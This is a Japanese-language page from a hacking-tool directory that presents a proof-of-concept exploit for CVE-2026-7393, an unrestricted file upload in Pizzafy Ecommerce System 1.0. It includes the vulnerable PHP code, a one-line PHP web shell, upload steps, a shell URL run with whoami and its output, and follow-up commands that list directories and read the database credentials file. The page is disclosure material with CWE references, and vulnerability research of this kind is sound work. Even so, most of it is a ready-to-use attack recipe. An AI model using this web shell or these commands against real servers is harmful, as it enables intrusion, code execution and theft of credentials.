Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-7393-RCE — CVE-2026-7393 の概念実証エクスプロイト: Pizzafy Ecommerce System 1.0 における無制限のファイルアップロードにより、認証済み管理者が PHP ウェブシェルをアップロードしてリモートコード実行を達成できます。 | Kitploit
ツール/GitHubGitHub/xmyronn/cve-2026-7393-rce
ペイロード生成脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubxmyronn/cve-2026-7393-rce

CVE-2026-7393-RCE

CVE-2026-7393 の概念実証エクスプロイト: Pizzafy Ecommerce System 1.0 における無制限のファイルアップロードにより、認証済み管理者が PHP ウェブシェルをアップロードしてリモートコード実行を達成できます。

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Pizzafy Ecommerce System 1.0 – save_menu() の無制限ファイルアップロードによるリモートコード実行

詳細

フィールド値
ベンダーSourceCodester
ベンダー URLhttps://www.sourcecodester.com
製品Pizzafy Ecommerce System using PHP and MySQL
製品 URLhttps://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html
バージョン1.0
脆弱性無制限のファイルアップロード → リモートコード実行
CWECWE-434
CVSSv3 スコア7.8(高)
攻撃ベクトルネットワーク
認証要件はい(管理者)
ユーザー操作なし
研究者Imad Alvi
日付2026-04-12

影響を受けるコンポーネント

ファイル: Pizzafy/admin/admin_class_novo.php → save_menu() 関数
パラメータ: img (FILE)
アップロードパス: Pizzafy/assets/img/


説明

Pizzafy Ecommerce System 1.0 の save_menu() 関数は、ファイルタイプの検証を行わずに、メニュー項目の画像アップロードを処理します。このアプリケーションは pathinfo() を使用してファイル拡張子を取得しますが、アップロードされたファイルを Web からアクセス可能な assets/img/ ディレクトリに移動する前に、許可されたファイルタイプを実際にチェックまたは制限することはありません。認証された管理者は、メニュー画像を装った PHP ウェブシェルをアップロードし、ブラウザから直接アクセスして、サーバー上でリモートコード実行を実現することができます。

admin_class_novo.php 内の脆弱なコード:

root@kitploit:~
function save_menu(){
    extract($_POST);
    // ...
    if($_FILES['img']['tmp_name'] != ''){
        $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
        $move = move_uploaded_file($_FILES['img']['tmp_name'],'../assets/img/'. $fname);
        $data .= ", img_path = '$fname' ";
    }
    // No extension check, no MIME type check
}

概念実証

ステップ 1 — PHP ウェブシェルを作成する

次の内容で shell_web2.php という名前のファイルを作成します:

root@kitploit:~
<?php echo shell_exec($_GET['cmd']); ?>

ステップ 2 — メニュー管理からウェブシェルをアップロードする

管理者としてログインし、次の場所に移動します:

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php?page=menu

メニューフォームに任意の有効な値を入力し、画像ファイルとして shell_web2.php を選択します。保存 をクリックします。

スクリーンショット 2026-04-12 171202

ウェブシェルは、顧客向けページのメニュー項目として表示されます。

スクリーンショット 2026-04-12 171236

ステップ 3 — アップロードしたシェルを見つける

assets ディレクトリに移動します — ディレクトリリスティングが有効になっています(CWE-548):

root@kitploit:~
http://192.168.0.9/pizzafy/Pizzafy/assets/img/

アップロードされた PHP シェルがディレクトリリスティングに表示されます。

スクリーンショット 2026-04-12 171300

ステップ 4 — リモートコマンドを実行する

アップロードしたシェルに直接アクセスし、cmd パラメータを介してシステムコマンドを渡します:

root@kitploit:~
http://192.168.0.9/pizzafy/Pizzafy/assets/img/1775994120_shell_web2.php?cmd=whoami

応答 — サーバー上で実行された OS コマンド:

root@kitploit:~
desktop-g1i9np3\dell
スクリーンショット 2026-04-12 171313

追加コマンド

root@kitploit:~
?cmd=whoami
?cmd=ipconfig
?cmd=dir C:\xampp\htdocs\pizzafy
?cmd=type C:\xampp\htdocs\pizzafy\Pizzafy\admin\db_connect.php

影響

認証された管理者は、以下のことが可能です:

  • Web サーバーに任意の PHP ファイルをアップロードできる
  • サーバー上で任意の OS レベルのコマンドを実行できる
  • データベースの資格情報を含む機密ファイルを読み取ることができる
  • 完全な永続的アクセスを得るためにリバースシェルを確立できる
  • 基盤となるサーバーを完全に侵害できる

ディレクトリリスティングに関する注意(CWE-548)

assets/img/ ディレクトリではディレクトリリスティングが有効になっており、認証されていないユーザーでもウェブシェルを含むすべてのアップロードファイルを閲覧できます。これにより、ファイルアップロードの脆弱性の深刻度がさらに高まります。


参照

  • SourceCodester — Pizzafy Ecommerce System
  • CWE-434: 危険なタイプのファイルの無制限アップロード(Unrestricted Upload of File with Dangerous Type)
  • CWE-548: ディレクトリリスティングによる情報漏えい(Exposure of Information Through Directory Listing)
ツールをダウンロード